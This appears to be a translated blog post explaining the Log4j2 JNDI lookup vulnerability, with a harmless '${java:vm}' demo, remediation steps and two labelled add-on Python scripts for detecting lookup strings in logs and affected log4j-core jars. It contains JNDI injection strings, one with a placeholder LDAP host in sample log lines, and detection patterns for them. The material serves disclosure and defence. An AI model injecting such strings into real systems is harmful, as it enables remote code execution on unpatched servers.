• J3 – leitian
  • Technology (Log4j # Security)

Have you been surprised by the vulnerability exposed by Log4j?

As a newcomer to the industry (Xiao Bai), I read the relevant news as soon as I learned of the vulnerability, and I roughly understand its ins and outs.

Let’s start with the official bug description:

Apache Log4j2 is a Java-based logging tool. It is a rewrite of the original Log4j framework and introduces many rich features. This logging framework is widely used in business-system development to record log information.

In most cases, developers write error messages that contain user input to the log. An attacker can exploit this vulnerability by constructing a specially crafted request that eventually triggers remote code execution.

Vulnerability severity: serious

Affected versions: 2.0 <= Apache Log4j2 <= 2.14.1

A security issue arises when a system uses Log4j to print user input containing the form ${} to a log.

Demo

1. Create a basic Maven project

2. Add the following dependencies

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.14.0</version>
</dependency>

3. Write Java code

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jErrorTest {

    private static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        // Notice this variable: on 2.14.0 the ${java:vm} lookup is resolved
        // when the message is logged, instead of being printed literally
        String error = "${java:vm}";
        logger.error("============== dangerous print, {}", error);
    }
}

4. The result

At first glance this does not look too dangerous: all that happened is that a system parameter value was printed, so the log output differs from the literal text.

But seeing this, the more you think about it, the more frightening it becomes.

If a hacker changes the value of the error variable to a reachable link, will Log4j resolve it as a parameter?

The answer is obviously yes.

Now think about it: if a string like ${jndi:rmi://dangerous link} is fed into the target program and logged, it will be resolved on the affected server.

If so, injecting a database operation that modifies data would be a meteoric rise to the peak of life; of course, I do not recommend doing so.

The principle

Our focus is on string substitution: Log4j treats ${} as a placeholder and replaces it with the value of a variable. This is implemented as a Lookup in Log4j.

The official Lookup documentation: logging.apache.org/log4j/2.x/m…

As I understand it, this functionality is built on JNDI, so the vulnerability works like this: we implement a custom JNDI program, send a string pointing at it to the target server program, and if the program prints the string we typed, it falls into the trap and executes our custom program on its system.

Mind you, it is our program that runs on their server; that is the biggest risk. (Ali rated the danger factor 10, which appears to be the maximum.)
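The lookup behaviour described above also gives defenders something to detect: any ${prefix:key} sequence in user-controlled input or in already-written logs is worth triaging, and the jndi prefix is the remote-code-execution path. The following Python triage helper is an added example, not code from the post or from the Log4j project. The sample log lines are constructed, placeholder.invalid is a placeholder host, and the severity labels are this example's own convention.

```python
import re
from dataclasses import dataclass, field

# Log4j 2 expands "${prefix:key}" anywhere in a logged message, and the
# expansion is recursive (a "${" inside another lookup is expanded first).
# Severity convention used by this example:
#   clean    - no "${" at all
#   suspect  - "${" present but no well-formed "prefix:" lookup
#   high     - a lookup prefix (java, env, ctx, ...) is present
#   critical - the jndi prefix is present
LOOKUP_RE = re.compile(r"\$\{\s*([A-Za-z0-9_-]+)\s*:")


@dataclass
class Verdict:
    severity: str
    prefixes: list = field(default_factory=list)  # lower-cased, in order found
    nested: bool = False  # more "${" openers than well-formed lookups


def classify(message: str) -> Verdict:
    """Triage one log line or one user-controlled string for Log4j lookup syntax."""
    openers = message.count("${")
    prefixes = [m.group(1).lower() for m in LOOKUP_RE.finditer(message)]
    nested = openers > len(prefixes)
    if "jndi" in prefixes:
        severity = "critical"
    elif prefixes:
        severity = "high"
    elif openers:
        severity = "suspect"
    else:
        severity = "clean"
    return Verdict(severity, prefixes, nested)


def scan(lines):
    """Return (line_number, verdict) for every line that is not clean."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict.severity != "clean":
            hits.append((number, verdict))
    return hits


# Constructed sample log lines (not real traffic); line 2 mirrors the post's demo.
SAMPLE_LINES = [
    '2021-12-10 10:01:02 INFO  search q="log4j patch notes" ua="Mozilla/5.0"',
    '2021-12-10 10:01:05 ERROR ============== dangerous print, ${java:vm}',
    '2021-12-10 10:01:09 WARN  login failed user="${jndi:ldap://placeholder.invalid:1389/a}"',
    '2021-12-10 10:01:11 INFO  template="${${env:LOGPREFIX}:key}"',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LINES):
        print(f"line {number}: {verdict.severity:8} prefixes={verdict.prefixes} nested={verdict.nested}")
```

Run it over a log file with scan(open(path)) and escalate anything marked critical; a high or suspect hit means user input is reaching the logger unchanged, which is the precondition the post describes even when the prefix is harmless.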

The solution

Method 1: Do not use Log4j for logging

Method 2: Upgrade to 2.15.0

If your project does not use Log4j logging itself but pulls it in transitively through other Maven dependencies, you can use Maven dependency exclusion.

Let me show how I checked my own project for Log4j dependencies.

The project I maintain: gitee.com/j3_baiqi/co…

1. Searching the project's JAR packages showed that the project does have a Log4j dependency, but I am quite sure I never introduced it directly, so the only possibility is that it came in transitively through another dependency.

2. Use the Maven Helper plugin to query JAR dependencies; install the plugin first.

3. Open the parsed pom.xml file and click the item I marked below to see all dependencies.

4. Next, find the Log4j dependencies and view them, as shown in figure 4.

5. Right-click the Log4j dependency, select Exclude, and refresh Maven; you will see that no Log4j dependency is associated with the project any more.
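The steps above rely on the IDE. For a deployed application, a build output directory or a local Maven cache, the same check can be scripted: find every jar that is really log4j-core (by the Maven pom.properties inside it, not by file name, so a renamed or repackaged jar is still caught) and compare its version with the affected range the post gives, 2.0 <= version <= 2.14.1, with 2.15.0 as the upgrade target. This Python scanner is an added example, not part of the post or of Log4j; the jars it scans in demo() are constructed fixtures that carry only the Maven metadata. Note that Apache later shipped 2.16 and 2.17 releases for follow-up issues, so treat AFFECTED_MAX as the boundary the post states and pin whatever the current release is.

```python
import os
import re
import tempfile
import zipfile

# Affected range as stated in the post; fixed version named in the post is 2.15.0.
AFFECTED_MIN = (2, 0, 0)
AFFECTED_MAX = (2, 14, 1)
# Maven writes this file into every jar it builds; for log4j-core it is at this path.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text: str) -> tuple:
    """'2.14.0' -> (2, 14, 0); tolerates a missing patch part and suffixes like 2.0-beta9."""
    nums = []
    for part in text.strip().split(".")[:3]:
        m = re.match(r"\d+", part)
        nums.append(int(m.group()) if m else 0)
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def is_affected(version: tuple) -> bool:
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def log4j_core_version(jar_path: str):
    """Return the log4j-core version recorded inside a jar, or None if it is not log4j-core."""
    try:
        with zipfile.ZipFile(jar_path) as zf:
            if POM_PROPS not in zf.namelist():
                return None
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    except zipfile.BadZipFile:
        return None
    return None


def scan_tree(root: str) -> list:
    """Walk a directory tree and report every log4j-core jar as (path, version, affected)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            version = log4j_core_version(path)
            if version is not None:
                findings.append((path, version, is_affected(parse_version(version))))
    return findings


def make_fake_jar(path: str, version: str) -> None:
    """Constructed test fixture: a minimal jar carrying only the Maven metadata."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\n"
                               f"version={version}\n")


def demo() -> list:
    """Build constructed jars in a temp dir and scan them; returns (name, version, affected)."""
    with tempfile.TemporaryDirectory() as tmp:
        make_fake_jar(os.path.join(tmp, "log4j-core-2.14.0.jar"), "2.14.0")
        make_fake_jar(os.path.join(tmp, "renamed-lib.jar"), "2.15.0")  # renamed, still found
        with zipfile.ZipFile(os.path.join(tmp, "other.jar"), "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")  # not log4j-core
        return sorted((os.path.basename(p), v, a) for p, v, a in scan_tree(tmp))


if __name__ == "__main__":
    for name, version, affected in demo():
        status = "AFFECTED, upgrade to 2.15.0" if affected else "not in the affected range"
        print(f"{name}: log4j-core {version} -> {status}")
```

Point scan_tree() at ~/.m2/repository, a target/ directory or a server's lib/ folder; any jar reported as affected is one that the exclusion or upgrade above has not yet removed.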

Well, that's it for today. Follow me and we'll see you next time.

Contact information:

QQ: 1491989462, add me as a friend and give a thumbs up.


  • Because of the blogger's limited knowledge, there will be mistakes; if you find errors or bias, please leave a comment and I will correct them.

  • If you think the article is good, your reposts, shares, likes and comments are the biggest encouragement to me.

  • Thank you for reading, and thank you for following.


CSDN:J3 – leitian

The nuggets:J3 – leitian

Zhihu:J3 – leitian

A programmer of average skill but keen to share; inexperienced but thick-skinned; young, good-looking, and insisting on making a living by talent.
